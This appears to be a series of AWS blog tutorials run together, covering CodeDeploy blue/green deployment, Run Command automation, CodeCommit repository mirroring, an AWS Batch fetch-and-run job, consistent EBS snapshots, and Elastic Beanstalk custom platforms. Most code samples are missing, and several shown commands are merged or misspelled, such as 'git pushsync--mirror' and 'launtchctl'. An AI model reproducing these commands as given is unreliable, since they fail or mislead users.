In the first approach, AWS CodeDeploy makes a copy of an Auto Scaling group. It, in turn, provisions new Amazon EC2 instances, deploys the application to these new instances, and then redirects traffic to the newly deployed code.

In the second approach, you use instance tags or an Auto Scaling group to select the instances that will be used for the green environment. AWS CodeDeploy then deploys the code to the tagged instances.

So how do you set up your first blue environment? A best practice is to start with an in-place deployment. You can also start with an existing, empty Auto Scaling group.

An example of blue/green deployments

Let’s take a look at an example of how to use Auto Scaling groups to perform a blue/green deployment.

Overview

In the following figure, the example environment includes an Amazon EC2 instance that serves as a workstation for AWS CodeDeploy. A release manager or developer could use this workstation to deploy new versions of code. The blue environment consists of an Auto Scaling group that provisions two more instances to function as web servers. The web servers will initially contain the first version of an application and the AWS CodeDeploy agent. A load balancer directs traffic to the two web servers in a round-robin manner.

The release manager uses the workstation instance to push a new version of the application to AWS CodeDeploy and starts a blue-green deployment. AWS CodeDeploy creates a copy of the Auto Scaling group. It launches two new web server instances just like the original two. AWS CodeDeploy installs the new version of the application and then redirects the load balancer to the new instances. The original instances continue to be part of the original Auto Scaling group. They can be reattached to the load balancer, if needed.

An AWS region and Availability Zone in which you can provision the environment.

An Amazon EC2 key pair.

Working knowledge of the aforementioned services and the AWS Management Console, and familiarity with connecting to an Amazon EC2 instance.

Other Considerations

You will incur charges from AWS for the use of the underlying AWS services in this example. The Amazon EC2 t2.micro instances and Amazon S3 storage might be covered under the AWS Free Tier, depending on your eligibility. The resources provided in this example are for training purposes. Be sure to consider the security needs of your organization when implementing techniques similar to those described in this blog post.

Step 1: Create the initial environment

Download an archive containing the sample template from this location and save it in a convenient location.

If this is a new AWS CloudFormation account, click Create New Stack. Otherwise, click Create Stack.

Under Upload a template to Amazon S3, click Choose File, choose the YAML file from the archive you downloaded, and then click Next.

In Specify Details, in Stack name, type bluegreen.

In AZName, select one of the Availability Zones. (In this blog post, I am using us-east-1a.)

In BlueGreenKeyPairName, select the key pair to use.

In NamePrefix, use the default value of bluegreen unless you are already running an application with a name that starts with bluegreen. The name prefix is used to assign name tags to the created resources. Click Next.

On the Options page, click Next.

Select the acknowledgement box to allow the creation of IAM resources, and then click Create. It will take CloudFormation about 10 minutes to create the sample environment. In addition to creating the infrastructure resources shown in the diagram, the CloudFormation template also sets up an AWS CodeDeploy application and blue/green deployment group.

Step 2: Review initial environment

Look at the CloudFormation stack outputs. You should see something similar to the following. WorkstationIP is the IP address of the workstation instance. AutoScalingGroup and LoadBalancer are the DNS names created by CloudFormation for the Auto Scaling group and the Elastic Load Balancing load balancer.

Copy the LoadBalancer value into your browser and browse to that link. The following application should be displayed. This PHP application queries the Amazon EC2 instance metadata. If you refresh the page, you will see the IP address and instance ID change in accordance with the round-robin load balancing algorithm.

Go to the EC2 console and display the instances. You will see three running instances associated with this example: the workstation and the two web server instances created by the Auto Scaling group. The web server instances make up the blue environment.

Step 3: Deploy the new version of code

Connect to the workstation instance at the address displayed in WorkStationIP. This instance is running the Ubuntu operating system, so the user name is ubuntu. After you sign in, you will see two directories. The scripts directory contains Bourne shell scripts. The newversion directory contains an update to the PHP application.

Here is the PHP code for the new version in newversion/content/index.php. The only difference from the initially installed code is the application version number.

Now look at the following scripts/pushnewversion.sh shell script. It uses the aws deploy push command to bundle the code and upload it to Amazon S3.

Run the pushnewversion.sh script. You will see a message that tells you how to deploy the code with the AWS command line interpreter, but we will use the AWS CodeDeploy console to do this instead.

Click the link for bluegreen-app. If you chose a name other than the default for NamePrefix, click that name instead. Expand Revisions. You will see the revision you just pushed from the AWS CodeDeploy workstation. Click Deploy revision.

On the Create deployment page, select the bluegreen-app application and the bluegreen-dg deployment group. Leave all the other default values in place, and then click Deploy. AWS CodeDeploy will provision the Auto Scaling group and instances, deploy the code, set up health checks, and redirect traffic to the new instances. This process will take a few minutes. When the deployment is complete, the deployment should appear, as shown here. AWS CodeDeploy skips the termination of the original instances because of the settings in the deployment group.

Step 4: Review the updated environment

Browse to the DNS name for the load balancer. You should see the new version of the application, as shown here. The application version has changed from 1 to 2, as expected.

Go to the EC2 console and display the instances. You will see four instances that have been tagged by the Auto Scaling group and launch configuration. The instances with IP addresses 10.200.11.11 and 10.200.11.192 are the ones we saw before in the blue environment. The deployment process created the instances with IP addresses 10.200.11.13 and 10.200.22 that are now part of the green environment.

Go to the Auto Scaling console. You will see that there are now two Auto Scaling groups, each of which has two instances. The Auto Scaling group whose names begins with CodeDeploy was created during the deployment process.

You have now successfully completed a blue/green deployment using AWS CodeDeploy.

Step 5: Cleanup

Return to the session on the AWS CodeDeploy workstation.

Run the scripts/cleanup.sh script. This will remove the deployment bundle and shut down the Auto Scaling groups.

Go to the CloudFormation console, select the stack you created, and delete it.

Conclusion

AWS CodeDeploy enables developers to automate code deployments to Amazon EC2 and on-premises instances. The blue/green deployment option enables release managers to create a new production environment and makes it easier to roll back to the previous environment if problems arise. For more information about AWS CodeDeploy, see the AWS CodeDeploy documentation. You can get started in just a few clicks.

EC2 Run Command is part of EC2 Systems Manager. It allows you to operate on collections of EC2 instances and on-premises servers reliably and at scale, in a controlled and selective fashion. You can run scripts, install software, collect metrics and log files, manage patches, and much more, on both Windows and Linux.

CloudWatch Events gives you the ability to track changes to AWS resources in near real-time. You get a stream of system events that you can easily route to one or more targets including AWS Lambda functions, Amazon Kinesis streams, Amazon SNS topics, and built-in EC2 and EBS targets.

Better Together Today we are bringing these two services together. You can now create CloudWatch Events rules that use EC2 Run Command to perform actions on EC2 instances or on-premises servers. This opens the door to all sorts of interesting ideas; here are a few that I came up with:

Final Log Collection – Collect application or system logs from instances that are being shut down (either manually or as a result of a scale-in operation initiated by Auto Scaling).

Instance Setup – After an instance has started, download & install applications, set parameters and configurations, and launch processes.

Configuration Updates – When a config file is changed in S3, install it on applicable instances (perhaps determined by tags). For example, you could install an updated Apache web server config file on a set of properly tagged instances, and then restart the server so that it picks up the changes. Or, update an instance-level firewall each time the AWS IP Address Ranges are updated.

EBS Snapshot Testing and Tracking – After a fresh snapshot has been created, mount it on a test instance, check the filesystem for errors, and then index the files in the snapshot.

Instance Coordination – Every time an instance is launched or terminated, inform the others so that they can update internal tracking information or rebalance their workloads.

I’m sure that you have some more interesting ideas; please feel free to share them in the comments.

Time for Action! Let’s set this up. Suppose I want to run a specific PowerShell script every time Auto Scaling adds another instance to an Auto Scaling Group.

I start by opening the CloudWatch Events Console and clicking on Create rule:

I configure my Event Source to be my Auto Scaling Group (AS-Main-1), and indicate that I want to take action when EC2 instances are launched successfully:

Then I set up the target. I choose SSM Run Command, pick the AWS-RunShellScript document, and indicate that I want the command to be run on the instances that are tagged as coming from my Auto Scaling group:

Then I click on Configure details, give my rule a name and a description, and click on Create rule:

With everything set up, the command service httpd start will be run on each instance launched as a result of a scale out operation.

Available Now This new feature is available now and you can start using it today.

Many of our customers have expressed interest in the following scenarios:

Backing up or replicating an AWS CodeCommit repository to another AWS region.

Automatically backing up repositories currently hosted on other services (for example, GitHub or BitBucket) to AWS CodeCommit.

In this blog post, we’ll show you how to automate the replication of a source repository to a repository in AWS CodeCommit. Your source repository could be another AWS CodeCommit repository, a local repository, or a repository hosted on other Git services.

To replicate your repository, you’ll first need to set up a repository in AWS CodeCommit to use as your backup/replica repository. After replicating the contents in your source repository to the backup repository, we’ll demonstrate how you can set up a scheduled job to periodically sync up your source repository with the backup/replica.

Where do I host this?

You can host your local repository and schedule your task on your own machine or on an Amazon EC2 instance. For an example of how to set up an EC2 instance for access to an AWS CodeCommit repository, including a sample AWS CloudFormation template for launching the instance, see Launch an Amazon EC2 Instance to Access the AWS CodeCommit Repository in the AWS for DevOps Guide.

Part 1: Set Up a Replica Repository

In this section, we’ll create an AWS CodeCommit repository and replicate your source repository to it.

If you haven’t already done so, set up for AWS CodeCommit. Then follow the steps to create a CodeCommit repository in the region of your choice. Choose a name that will help you remember that this repository is a replica or backup repository. For example, you could create a repository in the US East (Ohio) region and name it MyReplicaRepo. This is the name and region we’ll use in this post.

Use the git clone --mirror command to clone the source repository, including the directory where you want to create the local repo, to your local computer. You are not cloning the repository you just created in AWS CodeCommit. You are cloning the repository you want to replicate or back up to that AWS CodeCommit repository. For example, to clone a sample application created for AWS demonstration purposes and hosted on GitHub (https://github.com/awslabs/aws-demo-php-simple-app.git) to a local repo in a directory named my-repo-replica:

DO NOT use your working directory as the local clone repository. Your work-in-progress commits would also be pushed for backup.

DO NOT make local changes to this local repository. It should be used for sync-up operations only.

DO NOT manually push any changes to this replica repository. It will cause conflicts later when your scheduled job pushes changes in the source repository. Treat it as a read-only repository, and push all of your development changes to your source repository.

Change directories to the directory where you made the clone:

cd my-repo-replica

Use the git remote addRemoteName RemoteRepositoryURL command to add the AWS CodeCommit repository you created as a remote repository for the local repo. Use an appropriate nickname, such as sync. (Because this is a mirror, the default nickname, origin, will already be in use.) For example, to add your AWS CodeCommit repository MyReplicaRepo as a remote for my-repo-replica with the nickname sync:

When you push large repositories, consider using SSH instead of HTTPS. When you push a large change, a large number of changes, or a large repository, long-running HTTPS connections are often terminated prematurely due to networking issues or firewall settings. For more information about setting up AWS CodeCommit for SSH, see For SSH Connections on Linux, macOS, or Unix or For SSH Connections on Windows.

Tip

Use the git remote show command to review the list of remotes set for your local repo.

Run the git pushsync--mirror command to push to your replica repository.

If you named your remote for the replica repository something else, replace sync with your remote name.

The --mirror option specifies that all refs under refs/ (which includes, but is not limited to, refs/heads/, refs/remotes/, and refs/tags/) will be mirrored to the remote repository. If you only want to push branches and commits, but don’t care if you push other references such as tags, you can use the --all option instead.

Your replica repository is now ready for sync-up operations. To do a manual sync, run git pull to pull from your original repository, and then run git pushsync--mirror to push to the replica repository. Again, do not push any local changes to your replica repository at any time.

Part 2: Create a Periodic Sync Job

You can use a number of tools to set up an automated sync job. In this section, we’ll briefly cover four common tools: a cron job (Linux), a task in Windows Task Scheduler (Windows), a launchd instance (macOS), and, for those users who already have a Jenkins server set up, a Freestyle project with build triggers. Feel free to use whatever tools are best for you.

Note

Some hosted repositories offer options for syncing repositories, such as Git hooks, notifications, and other triggers. To learn more about those options, consult the documentation for your source repository system.

All of the following approaches rely on commands that pull the latest changes from the source repository to your local clone repo, and then mirror those changes to your AWS CodeCommit repository. They can be summed up as follows:

cd /path/to/your/local/repo git pull
git push sync --mirror

Where and how you save and schedule these commands depends on your operating system and tool(s). We’ve included just a few options/examples from a variety of approaches.

In Linux:

At the terminal, run the crontab -e command to edit your crontab file in your default editor.

Add a line for a new cron job that will change directories to your local clone repo, pull from your source repository, and mirror any changes to your AWS CodeCommit repository on the schedule you specify. For example, to run a daily job at 2:45 A.M. for a local repo named my-repo-replica in the ~/tmp directory where you nicknamed your remote (the AWS CodeCommit repository) sync, your new line might look like this:

Create a batch file that contains the command to change directories to your local clone repo, pull from your source repository, and mirror any changes up to your AWS CodeCommit repository. For example, if you created your local repo my-repo-replica in a c:\temp directory, and you nicknamed your remote (the AWS CodeCommit repository) sync, your file might look like this:

cd /d c:\temp\my-repo-replicagit pull
git push sync --mirror

Save the batch file with a name like my-repo-backup.bat.

Open Task Scheduler. (Not sure how? The simplest way is to open a command line and run msc.)

In Actions, choose Create Basic Task, and then follow the steps in the wizard.

In macOS:

Create a shell script that contains the command to change directories to your local clone repo, pull from your source repository, and mirror any changes up to your AWS CodeCommit repository. For example, if you created your local repo my-repo-replica in a ~/Documents directory, and you nicknamed your remote (the AWS CodeCommit repository) sync, your file might look like this:

cd ~/Documents/my-repo-replicagit pull
git push sync --mirror

Save the shell script with a name like my-repo-backup.sh.

Create a launchd property list file that runs the shell script on the schedule you specify. For example, if you stored my-repo-backup.sh in ~/Documents, to run the script daily at 2:45 A.M., your plist file might look like this:

Save your plist file in ~/Library/LaunchAgents, /Library/LaunchAgents, or /Library/LaunchDaemons folder, depending on the definition you want for the job.

Run the launtchctl command to load your job. For example, if you want to load a plist file named codecommit.sync.plist in ~/Library/LaunchAgents, your command might look like this:

launchctl load ~/Library/LaunchAgents/codecommit.sync.plist

For Jenkins:

Open Jenkins.

Create a new job as a Freestyle project.

In the Build Triggers section, select Build periodically, and set up a schedule for the task. Jenkins uses cron expressions to run periodic tasks. For more information, see the Jenkins documentation for the syntax of cron.

If you are replicating a GitHub or BitBucket repository, you can also set the task to build when the Git hook is triggered.

The following example builds once a day between midnight and 1 A.M.

In the Build section, add a build step and choose Execute Windows batch command or Execute Shell. Then write a script and implement the Git operations:

cd /path/to/your/local/repo git pull
git push sync --mirror

Note: Jenkins may require the full path for Git.

The following example is a Windows batch command file, with the full path for Git on the host.

Save the configuration for the task.

Your AWS CodeCommit replica repository will now be automatically updated with any changes to your source repository as scheduled.

We hope you’ve enjoyed this blog post. If you have questions or suggestions for future blog post, please leave it in the comments below or visit our user forum!

Docker enables you to create highly customized images that are used to execute your jobs. These images allow you to easily share complex applications between teams and even organizations. However, sometimes you might just need to run a script!

This post details the steps to create and run a simple “fetch & run” job in AWS Batch. AWS Batch executes jobs as Docker containers using Amazon ECS. You build a simple Docker image containing a helper application that can download your script or even a zip file from Amazon S3. AWS Batch then launches an instance of your container image to retrieve your script and run your job.

AWS Batch overview

AWS Batch enables developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS. AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g., CPU or memory optimized instances) based on the volume and specific resource requirements of the batch jobs submitted.

With AWS Batch, there is no need to install and manage batch computing software or server clusters that you use to run your jobs, allowing you to focus on analyzing results and solving problems. AWS Batch plans, schedules, and executes your batch computing workloads across the full range of AWS compute services and features, such as Amazon EC2 Spot Instances.

Prerequisites

Before you get started, there a few things to prepare. If this is the first time you have used AWS Batch, you should follow the Getting Started Guide and ensure you have a valid job queue and compute environment.

After you are up and running with AWS Batch, the next thing is to have an environment to build and register the Docker image to be used. For this post, register this image in an ECR repository. This is a private repository by default and can easily be used by AWS Batch jobs

Building the fetch & run Docker image

The fetch & run Docker image is based on Amazon Linux. It includes a simple script that reads some environment variables and then uses the AWS CLI to download the job script (or zip file) to be executed.

The FROM line instructs Docker to pull the base image from the amazonlinux repository, using the latest tag.

The RUN line executes a shell command as part of the image build process.

The ADD line, copies the fetchandrun.sh script into the /usr/local/bin directory inside the image.

The WORKDIR line, sets the default directory to /tmp when the image is used to start a container.

The USER line sets the default user that the container executes as.

Finally, the ENTRYPOINT line instructs Docker to call the /usr/local/bin/fetchandrun.sh script when it starts the container. When running as an AWS Batch job, it is passed the contents of the command parameter.

Now, build the Docker image! Assuming that the docker command is in your PATH and you don’t need sudo to access it, you can build the image with the following command (note the dot at the end of the command):

Push the built image to ECR

Now that you have a Docker image and an ECR repository, it is time to push the image to the repository. Use the following AWS CLI commands, if you have used the previous example names. Replace the AWS account number in red with your own account.

Create a simple job script and upload to S3

Next, create and upload a simple job script that is executed using the fetchandrun image that you just built and registered in ECR. Start by creating a file called myjob.sh with the example content below:

Key=BATCHFILES3_URL, Value=s3:///myjob.sh. Don’t forget to use the correct URL for your file.

After the job is completed, check the final status in the console.

In the job details page, you can also choose View logs for this job in CloudWatch console to see your job log.

How the fetch and run image works

The fetchandrun image works as a combination of the Docker ENTRYPOINT and COMMAND feature, and a shell script that reads environment variables set as part of the AWS Batch job. When building the Docker image, it starts with a base image from Amazon Linux and installs a few packages from the yum repository. This becomes the execution environment for the job.

If the script you planned to run needed more packages, you would add them using the RUN parameter in the Dockerfile. You could even change it to a different base image such as Ubuntu, by updating the FROM parameter.

Next, the fetchandrun.sh script is added to the image and set as the container ENTRYPOINT. The script simply reads some environment variables and then downloads and runs the script/zip file from S3. It is looking for the following environment variables BATCHFILETYPE and BATCHFILES3URL. If you run fetchand_run.sh, with no environment variables, you get the following usage message:

This shows that it supports two values for BATCHFILETYPE, either “script” or “zip”. When you set “script”, it causes fetchandrun.sh to download a single file and then execute it, in addition to passing in any further arguments to the script. If you set it to “zip”, this causes fetchandrun.sh to download a zip file, then unpack it and execute the script name passed and any further arguments. You can use the “zip” option to pass more complex jobs with all the applications dependencies in one file.

Finally, the ENTRYPOINT parameter tells Docker to execute the /usr/local/bin/fetchandrun.sh script when creating a container. In addition, it passes the contents of the COMMAND parameter as arguments to the script. This is what enables you to pass the script and arguments to be executed by the fetchandrun image with the Command field in the SubmitJob API action call.

Summary

In this post, I detailed the steps to create and run a simple “fetch & run” job in AWS Batch. You can now easily use the same job definition to run as many jobs as you need by uploading a job script to Amazon S3 and calling SubmitJob with the appropriate environment variables.

In my previous blog post, I discussed the challenge of creating Amazon EBS snapshots when you cannot turn off the instance during backup because this might exclude any data that has been cached by any applications or the operating system. I showed how you can use EC2 Systems Manager to run a script remotely on EC2 instances to prepare the applications and the operating system for backup and to automate the creating of snapshots on a daily basis. I gave a practical example of creating consistent Amazon EBS snapshots of Amazon Linux running a MySQL database.

In this post, I walk you through another practical example to create consistent snapshots of a Windows Server instance with Microsoft VSS (Volume Shadow Copy Service).

Understanding the example

The VSS service initiates and oversees the creation of shadow copies. A shadow copy is a point-in-time and consistent snapshot of a logical volume. For example, C: is a logical volume, which is different than an EBS snapshot. Multiple components are involved in the shadow copy creation:

The VSS requester requests the creation of shadow copies.

The VSS provider creates and maintains the shadow copies.

The VSS writers guarantee that you have a consistent data set to back up. They flush and freeze I/O operations, before the VSS provider creates the shadow copies, and release I/O operations, after the VSS provider has completed this action. There is usually one VSS writer for each VSS-compatible application.

I use Run Command to execute a PowerShell script on the Windows instance:

It creates a third file named scriptVss.txt containing DiskShadow commands. DiskShadow is a tool included in Windows Server 2008 and above, that exposes the functionality offered by the VSS service. The script creates a shadow copy of each logical volume stored on EBS, runs the shell script ebsSnapshot.cmd to create a snapshot of underlying EBS volumes, and then deletes the shadow copies to free disk space.

diskshadow.exe /s $VssScriptFileName
Exit $LastExitCode

Finally, it runs DiskShadow in script mode.

This PowerShell script is contained in a new SSM document and the maintenance window executes a command from this document every day at midnight on every Windows instance that has a tag “ConsistentSnapshot” equal to “WindowsVSS”.

Implementing and testing the example

First, use AWS CloudFormation to provision some of the required resources in your AWS account.

Open Create a Stack to create a CloudFormation stack from the template.

Choose Next.

Enter the ID of the latest AWS Windows Server 2016 Base AMI available in the current region (see Finding a Windows AMI) in pWindowsAmiId.

Follow the on-screen instructions.

CloudFormation creates the following resources:

A VPC with an Internet gateway attached.

A subnet on this VPC with a new route table, to enable access to the Internet and therefore to the AWS APIs.

An IAM role to grant an EC2 instance the required permissions.

A security group that allows RDP access from the Internet, as you need to log on to the instance later on.

A Windows instance in the subnet with the IAM role and the security group attached.

A SSM document containing the script described in the section above to create consistent EBS snapshots.

Another SSM document containing a script to restore logical volumes to a consistent state, as explained in the next section.

An IAM role to grant the maintenance window the required permissions.

After the stack creation completes, choose Outputs in the CloudFormation console and note the values returned:

IAM role for the maintenance window

Names of the two SSM documents

Then, manually create a maintenance window, if you have not already created it. For detailed instructions, see the “Example” section in the previous blog post.

After you create a maintenance window, assign a target where the task will run:

In the Maintenance Window list, choose the maintenance window that you just created.

You can view the history either in the History tab of the Maintenance Windows navigation pane of the Amazon EC2 console, as illustrated on the following figure, or in the Run Command navigation pane, with more details about each command executed.

Restoring logical volumes to a consistent state

DiskShadow―the VSS requester in this case―uses the Windows built-in VSS provider. To create a shadow copy, this built-in provider does not make a complete copy of the data. Instead, it keeps a copy of a block data before a change overwrites it, in a dedicated storage area. The logical volume can be restored to its initial consistent state, by combining the actual volume data with the initial data of the changed blocks.

The DiskShadow command create instructs the VSS service to proceed with the creation of shadow copies, including the release of I/O operations by the VSS writers after the shadow copies are created. Therefore, the EBS snapshots created by the next command exec may not be fully consistent.

Note: A workaround could be to build your own VSS provider in charge of creating EBS snapshots. Doing so would enable the EBS snapshots to be created before I/O operations are released. We will not develop this solution in this blog post.

Therefore, you need to “undo” any I/O operations that may have happened between the moment when the shadow copy was created and the moment when the EBS snapshots were created.

A solution consists of creating an EBS volume from the snapshot, attaching it to an intermediate Windows instance and to “revert” the VSS shadow copy to restore the EBS volume to a consistent state. For sake of simplicity, use the Windows instance that was backed up as the intermediate instance.

In Command document, select the name of a SSM document to restore snapshots returned by CloudFormation. For Target instances, select the Windows and choose Run.

Run Command executes the following PowerShell script on the Windows instance. It retrieves the list of offline disks—which corresponds in this case to the EBS volume that you just attached—and for each offline disk, takes it online, revert existing shadow copies and takes it offline again.

The EBS volume is now in a consistent state and can be detached from the intermediate instance.

Conclusion

In this series of blog posts, I showed how you can use Amazon EC2 Systems Manager to create consistent EBS snapshots on a daily basis, with two practical examples for Linux and Windows. You can adapt this solution to your own requirements. For example, you may develop scripts for your own applications.

If an EC2 instance is up and running, there may be applications working, like databases, with data in memory or pending I/O operations that cannot be retrieved from an Amazon EBS snapshot. If your application is unable to recover from such a state, you might lose vital data for your business.

Amazon EBS provides block level storage volumes for use with EC2 instances. With EBS, you can create point-in-time snapshots of volumes, stored reliably on Amazon S3. If you rely on EBS snapshots as your backup solution and if you cannot turn off the instance during backup, you can create consistent EBS snapshots, which consists of informing the applications that they are about to be backed up so they can get prepared.

In this post, the first of a two-part series, I show you how to use Run Command and Maintenance Window, two features of Amazon EC2 Systems Manager, to automate the execution of scripts on EC2 instances that create consistent EBS snapshots. First, I explain the approach. Then, I walk you through a practical example to create consistent snapshots of an Amazon Linux EC2 instance running MySQL.

Creating consistent EBS snapshots with Run Command

Run Command lets you securely and remotely manage the configuration of Windows or Linux instances. For example, you can run scripts―or commands―without having to log on locally to the instance. Run Command requires the SSM Agent to be installed on the EC2 instances.

I use Run Command to run a script remotely on EC2 instances. The script coordinates the preparation of applications and the creation of EBS snapshots, as follows:

It instructs the applications and the file system to flush their cached data to the disk and then to temporary block all I/O operations. At this moment, the EBS volume is in a consistent state.

It queries the EC2 API to obtain the ID of the EBS volumes attached to the instance, then to create a snapshot of each of the EBS volumes.

Finally, it thaws I/O operations as soon as the EC2 API responds to the last request with a snapshot ID. It is not necessary to wait for the snapshot to complete.

The content of the script varies upon the system and the applications that should be prepared for backup. See the example sections later in this post.

Instances communicate with the Run Command API to retrieve commands to execute and return results, and with the EC2 API to get volume attachment information and create EBS snapshots. To grant permission to call the APIs, I launch the instances with an IAM role for EC2 instances. This role is attached to the SSM Managed PolicyAmazonEC2RoleforSSM and to an inline policy which allows ec2:DescribeInstanceAttribute and ec2:CreateSnapshot actions.

Using Run Command has multiple benefits:

The scripts are maintained centrally and any changes are effective immediately on every instance

Commands are executed remotely and the instances continuously retrieve and run new commands

Status and results of each command execution are reported by Run Command and the information is also stored in AWS CloudTrail for audit purposes

Run Command is integrated with IAM to allow you to control both the users and level of access

Executing commands on a daily basis with Maintenance Windows

Maintenance Windows allows you to specify a recurring time window during which Run Command tasks are executed. I use Maintenance Windows to create consistent EBS snapshots on a daily basis during off-peak hours, because it may temporarily increase resource utilization and affect application performance.

The maintenance window is registered with multiple targets. Each target is a set of EC2 instances that have a tag “ConsistentSnapshot” assigned and an arbitrary value depending on what script to execute. Each target is registered with a task assigned to an SSM document, which describes the actions to perform by Run Command to create consistent EBS snapshots on every instance of this target.

Understanding the example

I use Run Command to execute a shell script on the Amazon Linux instance:

mysql -u backup -h localhost -e 'FLUSH TABLES WITH READ LOCK;'

First, the shell script prepares MySQL for backup. The command FLUSH TABLES WITH READ LOCK waits for the active transactions to complete, flushes the cache to the filesystem, and prevents clients from making write operations (see FLUSH in the MySQL documentation). You should note that this MySQL backup method implies a short interruption of write operations, and the duration depends on the current size and workload. You should make sure that the backup does not affect your applications.

This shell script is contained in a new SSM document. The maintenance window executes a command from this document every day at midnight on every Linux instance that has a tag “ConsistentSnapshot” equal to “AmazonLinuxMySQL”.

Implementing and testing the example

First, use AWS CloudFormation to provision some of the required resources in your AWS account.

Open Create a Stack to create a CloudFormation stack from the template.

Follow the on-screen instructions.

CloudFormation creates the following resources:

A VPC with an Internet gateway attached

A subnet on this VPC with a new route table to enable access to the Internet and therefore to the AWS APIs

An IAM role to grant an EC2 instance the required permissions

An Amazon Linux instance in the subnet with the IAM role attached and the user data script entered to install and configure MySQL and the SSM Agent at launch

A SSM document containing the script described in the section earlier.

An IAM role to grant the maintenance window the required permissions

After the stack creation completes, choose Outputs in the CloudFormation console and note the values that the process returned:

In the Maintenance Window list, select the maintenance window that you just created.

For Actions, choose Register tasks.

For Document, select the SSM document that was returned by CloudFormation.

Under the Target by section, select the target that you just created.

Under the Role section, select the IAM role that was returned by CloudFormation.

Under the Execute on section, for Targets, enter 1. For Stop after, enter 1 errors. You can adapt these numbers to your own needs.

Choose Register task.

You can view the history either in the History tab of the Maintenance Windows navigation pane of the Amazon EC2 console, as illustrated on the following figure, or in the Run Command navigation pane, with more details about each command executed.

Conclusion

In this post, I showed how you can use Amazon EC2 Systems Manager to create consistent EBS snapshots on a daily basis, with a practical example for MySQL running in an Amazon Linux instance.

In the next part of this two-part series, I walk you through another example to create consistent snapshots of a Windows Server instance with Microsoft VSS (Volume Shadow Copy Service).

There is excitement in the air! I am thrilled to announce that customers can now create custom platforms in AWS Elastic Beanstalk. With this latest release of the AWS Elastic Beanstalk service, developers and systems admins can now create and manage their own custom Elastic Beanstalk platform images allowing complete control over the instance configuration. As you know, AWS Elastic Beanstalk is a service for deploying and scaling web applications and services on common web platforms. With the service, you upload your code and it automatically handles the deployment, capacity provisioning, load balancing, and auto-scaling.

Previously, AWS Elastic Beanstalk provided a set of pre-configured platforms of multiple configurations using various programming languages, Docker containers, and/or web containers of each aforementioned type. Elastic Beanstalk would take the selected configuration and provision the software stack and resources needed to run the targeted application on one or more Amazon EC2 instances. With this latest release, there is now a choice to create a platform from you own customized Amazon Machine Image (AMI). The custom image can be built from one of the supported operating systems of Ubuntu, RHEL, or Amazon Linux. In order to simplify the creation of these specialized Elastic Beanstalk platforms, machine images are now created using the Packer tool. Packer is an open source tool that runs on all major operating systems, used for creating machine and container images for multiple platforms from a single configuration.

Custom platforms allow you to manage and enforce standardization and best practices across your Elastic Beanstalk environments. For example, you can now create your own platforms on Ubuntu or Red Hat Enterprise and customize your instances with languages/frameworks currently not supported by Elastic Beanstalk e.g. Rust, Sinatra etc.

Creating a Custom Platform

In order to create your custom platform, you start with a Packer template. After the Packer template is created, you would create platform definition file, a platform.yaml file, platform hooks, which will define the builder type for the platform, and script files,. With these files in hand, you would create a zip archive file, called a platform definition archive, to package the files, associated scripts and/or additional items needed to build your Amazon Machine Image (AMI). A sample of a basic folder structure for building a platform definition archive looks as follows:

|– builder

Contains files used by Packer to create the custom platform

|– custom_platform.json

Packer template

|– platform.yaml

Platform definition file

|– ReadMe.txt

Describes the sample

The best way to take a deeper look into the new custom platform feature of Elastic Beanstalk is to put the feature to the test and try to build a custom AMI and platform using Packer. To start the journey, I am going to build a custom Packer template. I go to the Packer site, and download the Packer tool and ensured that the binary is in my environment path.

Now let’s build the template. The Packer template is the configuration file in JSON format, used to define the image we want to build. I will open up Visual Studio and use this as the IDE to create a new JSON file to build my Packer template.

The Packer template format has a set of keys designed for the configuration of various components of the image. The keys are:

variables (optional): one or more key/value strings defining user variables

builders (required): array that defines the builders used to create machine images and configuration of each

provisioners (optional): array defining provisioners to be used to install and configure software for the machine image

description (optional): string providing a description of template

min_packer_version (optional): string of minimum Packer version that is required to parse the template.

post-processors (optional): array defining post-processing steps to take once image build is completed

If you want a great example of the Packer template that can be used to create a custom image used for a custom Elastic Beanstalk platform, the Elastic Beanstalk documentation has samples of valid Packer templates for your review.

In the template, I will add a provisioner to run a build script to install Node with information about the script location and the command(s) needed to execute the script. My completed JSON file, tara-ebcustom-platform.json, looks as follows:

Now that I have my template built, I will validate the template with Packer on the command line.

What is cool is that my Packer template fails because, in the template, I specify a script, eb_builder.sh, that is located in a builder folder. However, I have not created the builder folder nor shell script noted in my Packer template. A little, confused that I am happy that my file failed? I believe that this is great news because I can catch errors in my template and/or missing files needed to build my machine image before uploading it to the Elastic Beanstalk service. Now I will fix these errors by building the folder and file for the builder script.

Using the sample of the scripts provided in the Elastic Beanstalk documentation, I build my Dev folder with the structure noted above. Within the context of Elastic Beanstalk custom platform creation, the aforementioned scripts are platform hooks. Platform Hooks are run during lifecycle events and in response to management operations.

An example of the builder script used in my custom platform implementation is shown below:

My builder folder structure holds the platform hooks and other scripts referred to as platform scripts used to build the custom platform. Platform scripts are the shell scripts that you can use to get environment variables and other information in platform hooks. The platform hooks are located in a subfolder of my builder folder and follows the structure shown below:

All of these items; Packer template, platform.yaml, builder script, platform hooks, setup, config files and platform scripts make up the platform definition contained in my builder folder you see below.

I will leverage the platform.yaml provided in the sample .yaml file and change it as appropriate for my Elastic Beanstalk custom platform implementation. The result is following completed platform.yaml file:

The template has now validated successfully, and my folder structure is completed.

All that is left for me is to create the platform using the EB CLI. This functionality is available with EB CLI version 3.10.0 or later. You can install the EB CLI from here and follow the instructions for installation in the Elastic Beanstalk developer guide.

To use the EB CLI to create a custom platform, I would select the folder containing the files extracted from the platform definition archive. Within the context of that folder, I need perform the following steps:

Use the EB CLI to initialize the platform repository and follow the prompts

eb platform init or ebp init

Launch the Packer environment with the template and scripts

eb platform create or ebp create

Validate an IAM role was successfully created for the instance. This instance profile role will be automatically created via the EB create process.

aws-elasticbeanstalk-custom-platform-ec2-role

Verify status of platform creation

eb platform status or ebp status

I will now go to the Command Line and use EB CLI command to initialize the platform by running the eb platform init command.

Next step is to create the custom platform using the EB CLI, so I’ll run the shortened command, ebp create, in my platform folder.

Success! A custom Elastic Beanstalk platform has been created and we can deploy this platform for our web solution. It is important to remember that when you create a custom platform, you launch a single instance environment without an EIP that runs Packer, and additionally you can reuse this environment for multiple platforms, as well as, multiple versions of each platform. Additionally, custom platforms are region-specific, therefore, you must create your platforms separately in each region if you use Elastic Beanstalk in multiple regions.

Deploying Custom Platforms

